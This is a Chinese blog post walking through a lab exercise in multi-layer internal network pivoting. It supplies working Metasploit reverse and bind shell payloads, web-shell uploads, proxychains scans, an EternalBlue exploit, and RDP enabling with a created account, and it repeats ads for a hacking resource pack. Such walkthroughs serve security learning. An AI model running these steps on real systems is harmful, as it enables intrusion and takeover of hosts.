我猜你也在找内网渗透的教程,这篇难道还不够你嚼烂?
前言近年来攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜攻击者在经常会企业的内网进行横向渗透令防守方防不胜防。因此我们应该严格控制好网络区域之间的访问规则加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。1.实验简介网络拓扑图渗透机win10kali第一层靶机 (外网web服务器): Linux第二场靶机 (内网web服务器): Linux第三层靶机 (内网办公机) : win7用三层网络来模拟内外网环境,主要了解MSF、内网转发等。2.环境搭建第一层网络把渗透机kali和win10网卡1设置选择VMnet1靶机Linux网卡1设置选择VMnet1添加网卡2 设置选择VMnet2第二层网络将第二台靶机Linux网卡1设置选择VMnet2添加网卡2 设置选择VMnet3第三层网络将靶机win7网卡1设置选择VMnet3再配置好各台机器对应IP即可。最后在第一台Linux和第二台Linux上搭建一个php上传页面设为存在文件上传漏洞的web页面以便后续的拿shell进行内网渗透。我给大家准备了一份全套的《网络安全入门进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~第一台Linux第二台Linux3.实验过程第一层靶机win10访问[http://192.168.85.131/直接上传一句话蚁剑连接进一步做内网渗透上传msf后门打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.85.128 LPORT4444 -f elf mshell.elf生成一个名为mshell.elf的msf后门文件蚁剑把后门文件上传到Linux靶机返回msf 开启监听use exploit/multi/handler 使用监听模块 set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload set lhost 192.168.85.128 kaili 的ip set lport 4444 木马的端口 run 执行蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件输入chmod 777 mshell.elf 加执行权限 ./mshell.elf 执行文件Kail接受到MSF会话输入ifconfig发现第二层172.10.10.0/24网段我给大家准备了一份全套的《网络安全入门进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~添加路由background 将会话转到后台 route add 172.10.10.0/24 1 添加 172.10.10.0/24网段 使用session1 route print 查看路由表使用MSF建立socks代理use auxiliary/server/socks4a set srvhost 192.168.85.128 set srvport 10080 run配置socks4代理的相关客户端Proxychains 在配置文件/etc/proxychains.conf中添加 socks4 192.168.85.128 10080 vi /etc/proxychains.conf添加socks4 192.168.85.128 10080这样利用proxychains启动的应用都可以带sock4代理proxychains 为kali自带的非MSF里的。建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络第二层网络nmap探测存在web服务的主机用proxychans启动nmap对第二层网段进行80端口扫描执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip由于proxychains无法代理icmp的数据包所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。脚本探测存活主机在本地创建一个名为ping.sh的脚本脚本内容如下#!/bin/bash ip”172.10.10.” echo “ping log:” ./ping.txt for i in {1..254} do ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl” echo “$ip$i [yes]” ./ping.txt || echo “$ip$i [no]” ./ping.txt done echo “wait 5s….” sleep 5 cat ./ping.txt cat ./ping.txt | wc -lKali进入session1会话然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload进入shell执行python -c ‘import pty;pty.spawn(“/bin/bash”)’创建一个完全交互式shell后Chmod 777 ping.sh ./ping.sh可以看到172.10.10.0/24网段存活56.57两台知道存活主机ip后就可以继续进入第二层内网主机渗透机浏览器配置sock4a代理蚁剑加代理连接连接 http://172.10.10.56/upload/php1.php进一步做内网渗透继续上传msf后门制作MSF后门返回kali msf 输入msfvenom -p linux/x64/meterpreter/bind_tcp LPORT4455 -f elf mshell1.elf生成 mshell1.elf后门文件因为在内网跨网段时无法反向代理连接到渗透的机器所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。 蚁剑上传后门蚁剑打开虚拟终端执行后门文件返回会话我给大家准备了一份全套的《网络安全入门进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~输入ifconfig 发现第三层网络的网段10.10.10.0/24第三层网络添加路由background route add 10.10.10.0/24 2 route print进入session 2 上传 脚本 探测存活主机 注意把脚本的ip段修改成该网段再上传探测到第三层网段的存活ip 10.10.10.101proxychans 启动nmap对10.10.10.101的1-500端口扫描执行 proxychains nmap -sT -Pn -p 1-500 10.10.10.101发现445端口开启尝试使用ms17-010 use windows/smb/ms17_010_eternalblue set rhost 10.10.10.101 set payload windows/x64/meterpreter/bind_tcp set lport 4466Run 存在445漏洞执行成功返回会话开启3389远程桌面run post/windows/manage/enable_rdp 开启远程桌面 run post/windows/manage/enable_rdp USERNAMEzzy PASSWORD123qwe!# 添加远程用户将3389端口转回kali本地5555端口 portfwd add -l 5555 -p 3389 -r 10.10.10.101Win10远程桌面连接登陆成功网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取1.成长路线图学习规划要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。2.网安入门到进阶视频教程很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程扫描领取哈3.SRC黑客文档大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录SRC技术文籍黑客资料由于是敏感资源这里不能直接展示哦全套教程扫描领取哈4.护网行动资料其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指5.黑客必读书单6.网络安全岗面试题合集当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2559676.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!